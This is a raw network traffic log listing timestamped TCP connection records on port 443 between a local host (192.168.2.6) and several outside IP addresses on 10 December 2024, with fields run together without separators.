                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.567337036 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.573626041 CET49772443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.573637962 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.573664904 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.575335026 CET44349773142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.575345993 CET44349774172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.575364113 CET44349779172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.583333015 CET44349776172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.663331032 CET44349767172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.663331985 CET44349768172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.663418055 CET49768443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.663484097 CET49767443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.774807930 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.878868103 CET49791443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.878916025 CET4434979120.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.879039049 CET49791443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.879759073 CET49791443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.879776001 CET4434979120.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.881661892 CET44349767172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.881735086 CET44349767172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.881809950 CET49767443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.882069111 CET49767443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.882086992 CET44349767172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.882688999 CET44349768172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.882761955 CET44349768172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.882846117 CET49768443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.883122921 CET49768443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.883136034 CET44349768172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.946491957 CET44349772172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.946572065 CET44349772172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.946712971 CET49772443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.951611996 CET49772443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:31.951648951 CET44349772172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.110964060 CET44349774172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.111076117 CET44349774172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.111179113 CET49774443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.111179113 CET49774443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.155956030 CET44349776172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.156065941 CET44349776172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.156133890 CET49776443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.156161070 CET49776443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.182022095 CET44349761162.125.65.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.182112932 CET44349761162.125.65.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.182145119 CET49761443192.168.2.6162.125.65.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.182187080 CET49761443192.168.2.6162.125.65.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.201736927 CET49761443192.168.2.6162.125.65.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.275935888 CET44349779172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.276057959 CET44349779172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.276093006 CET49779443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.276137114 CET49779443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.487423897 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.487452984 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.487462044 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.487492085 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.487507105 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.487517118 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.487519026 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.487556934 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.487580061 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.487580061 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.487603903 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.565329075 CET49797443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.565356970 CET44349797162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.565459967 CET49797443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.565836906 CET49797443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.565846920 CET44349797162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.601772070 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.601788998 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.601819038 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.601830006 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.601843119 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.601845026 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.601857901 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.601886988 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.601917028 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.607929945 CET44349773142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.608000040 CET49773443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.648593903 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.648611069 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.648641109 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.648675919 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.648689032 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.648722887 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.648742914 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.648761034 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.683442116 CET49799443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.683465004 CET44349799172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.683532000 CET49799443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.683742046 CET49800443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.683782101 CET44349800172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.683828115 CET49800443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.683988094 CET49799443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.684001923 CET44349799172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.684200048 CET49800443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.684215069 CET44349800172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.747481108 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.747994900 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.748023033 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.748482943 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.751230955 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.751323938 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.751928091 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.751966000 CET44349786172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.752305984 CET44349790172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.752418041 CET49786443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.752434015 CET44349786172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.752734900 CET44349786172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.752785921 CET49790443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.752803087 CET44349790172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.753176928 CET44349790172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.754868984 CET49786443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.754920959 CET44349786172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.755060911 CET49790443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.755131006 CET44349790172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.773648024 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.773674011 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.773718119 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.773745060 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.773770094 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.773785114 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.795332909 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.802222013 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.802247047 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.802329063 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.802357912 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.802500963 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.830265045 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.830282927 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.830343962 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.830374002 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.830547094 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.842350960 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.842412949 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.842442036 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.842457056 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.842526913 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.842776060 CET49765443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.842793941 CET44349765162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.872730970 CET49786443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:32.872730970 CET49790443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.190273046 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.190402031 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.190455914 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.191631079 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.191653013 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.238181114 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.238591909 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.238614082 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.239021063 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.239037991 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.239088058 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.239094019 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.239130974 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.239830971 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.241472960 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.241539955 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.241666079 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.241671085 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.384092093 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.465643883 CET49801443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.465679884 CET44349801172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.465749025 CET49801443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.466124058 CET49802443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.466167927 CET44349802172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.466226101 CET49802443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.467180967 CET49801443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.467190027 CET44349801172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.467258930 CET49802443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.467286110 CET44349802172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.699517965 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.699548960 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.699619055 CET49786443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.699647903 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.699924946 CET49803443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.699934006 CET44349803172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.743329048 CET44349786172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.894834042 CET44349800172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.895015955 CET44349799172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.895210981 CET49800443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.895235062 CET44349800172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.895292044 CET49799443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.895308018 CET44349799172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.895694971 CET44349799172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.896051884 CET49799443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.896112919 CET44349799172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.896295071 CET44349800172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.896347046 CET49800443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.897486925 CET49800443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.897543907 CET44349800172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.923700094 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.927829981 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.927886963 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.927910089 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.936069012 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.936124086 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.936141014 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.948805094 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.948848963 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.948867083 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.962214947 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.962738037 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.962757111 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.976876020 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.976934910 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:33.976953030 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.032998085 CET44349797162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.033093929 CET49797443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.033113956 CET44349797162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.033205986 CET49797443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.035238981 CET49797443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.035245895 CET44349797162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.035490990 CET44349797162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.037126064 CET49797443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.044580936 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.044630051 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.044651985 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.044684887 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.045298100 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.048351049 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.056967020 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.057043076 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.057071924 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.079339981 CET44349797162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.087241888 CET49799443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.087246895 CET49800443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.087276936 CET44349800172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.103924990 CET4434979120.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.104007006 CET49791443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.106926918 CET49791443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.106946945 CET4434979120.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.107233047 CET4434979120.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.109257936 CET49791443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.109421015 CET49791443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.109433889 CET4434979120.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.109633923 CET49791443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.119049072 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.119251966 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.119281054 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.127120018 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.127657890 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.127684116 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.135361910 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.135433912 CET49785443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.135442972 CET44349785142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.141325951 CET44349786172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.141388893 CET44349786172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.141452074 CET49786443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.141663074 CET49786443192.168.2.6172.64.41.3
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.141679049 CET44349786172.64.41.3192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:34.147228003 CET44349785142.250.181.65192.168.2.6
